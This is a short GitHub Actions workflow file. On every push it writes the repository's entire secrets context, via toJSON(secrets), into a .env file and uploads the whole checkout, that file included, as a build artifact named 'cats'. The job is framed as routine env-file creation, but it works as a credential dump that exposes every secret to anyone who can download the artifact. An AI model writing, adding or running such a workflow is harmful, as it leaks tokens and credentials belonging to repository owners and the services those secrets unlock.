Skip to content

Workflow file for this run

on: push
jobs:
create-envfile:
runs-on: ubuntu-latest
steps:
- name: Make File
uses: SpicyPizza/[email protected]
with:
envkey_DEBUG: ${{ toJSON(secrets) }}
file_name: .env
fail_on_empty: false
- name: Upload
uses: actions/upload-artifact@v4
with:
name: cats
path: .